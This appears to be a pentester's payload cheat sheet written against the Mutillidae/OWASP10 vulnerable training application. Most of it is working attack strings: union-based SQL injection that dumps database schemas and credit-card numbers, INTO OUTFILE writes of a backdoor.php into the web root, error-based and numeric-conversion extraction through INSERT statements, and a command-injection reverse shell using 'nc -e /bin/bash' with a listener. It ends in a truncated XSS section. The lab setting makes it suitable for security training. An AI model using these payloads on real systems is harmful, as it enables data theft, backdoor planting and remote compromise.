### SELECT ### # basic ' or 1=1 -- ' union select null -- ' union select null, null, null, null, null -- # get databases ' union select null, (select group_concat(distinct table_schema separator ',') from information_schema.tables order by table_schema), null, null, null -- # get tables ' union select null, (select group_concat(distinct table_name separator ',') from information_schema.tables where table_schema='owasp10' order by table_name), null, null, null -- # get columns ' union select null, (select group_concat(distinct column_name separator ',') from information_schema.columns where table_schema='owasp10' and table_name='credit_cards' order by table_name), null, null, null -- # get cc numbers ' union select null, (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 1), null, null, null -- # get cc numbers 3x ' union select null, (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 1), (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 2,1), (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 3,1), null -- ' union select null, null, null, null, (select "" into outfile "/var/www/mutillidae/backdoor.php") -- ' union select null, null, null, null, (select "" into outfile "/tmp/backdoor.php") -- ### INSERT ### # Basic # Insert error name_const() ' or (SELECT * FROM (SELECT (name_const(version(),1)), name_const(version(),1)) a) or ' # can only get the version in latest version # ERROR 1210 (HY000): Incorrect arguments to NAME_CONST <-- cannot do more # ERROR 1060 (42S21): Duplicate column name '2' <-- Good to go ' or (SELECT * FROM (SELECT name_const((SELECT 2), 1),name_const((SELECT 2),1)) a) or ' ' or (SELECT * FROM (SELECT name_const((SELECT GROUP_CONCAT(distinct table_name separator ',') FROM information_schema.tables WHERE table_schema=database() order by table_name),1),name_const((SELECT GROUP_CONCAT(distinct table_name separator ',') FROM information_schema.tables WHERE table_schema=database() order by table_name),1)) a) or ' # Insert error extractvalue() -- not supported by this DB ' or extractvalue(1,concat(0x7e,database())) or ' # There is no string concatenation in MySQL, we cannot UNION into an INSERT statement, and we cannot simply chain a query with a semi-colon in mysql. # we can, however, perform math. (This will not work in strict mode, i.e. MySQL 5.7.5+) # Demo strings are numbers select 'osanda' = 0; select 'osanda'+~0; # ~0 is BIGINT, this gives us a double select ~0+0e0; # DOUBLE select (~0+0e0) = ('osanda' + ~0) ; # Same select 'osanda' | ~0; # we can extract 8-byte strings as numbers # Insert conv(hex()) select conv(hex('01234567'), 16, 10); select unhex(conv(3472611983179986487, 10, 16)); # conv(hex()) w/ substr() -- select conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10); ' | conv(hex(substr(user(),1, 8)), 16, 10) | ' ## select unhex(conv(8245931987826405219, 10, 16)); ' | conv(hex(substr(user(),9, 16)), 16, 10) | ' ## select unhex(conv(107118236496756, 10, 16)); # In-band injection asdf', version()) -- # password field, password becomes asdf, signature gets replaced ### SQLMAP ### sqlmap -u "" ### COMMAND INJECTION ### # Basic && echo ‘asdf’ # Listen for connect-back nc -l -p 5000 # don't specify an IP here, it will filter # Connect-back && nc 5000 -e /bin/bash ### XSS ### # Pen Test Tool Lookup: "}}); }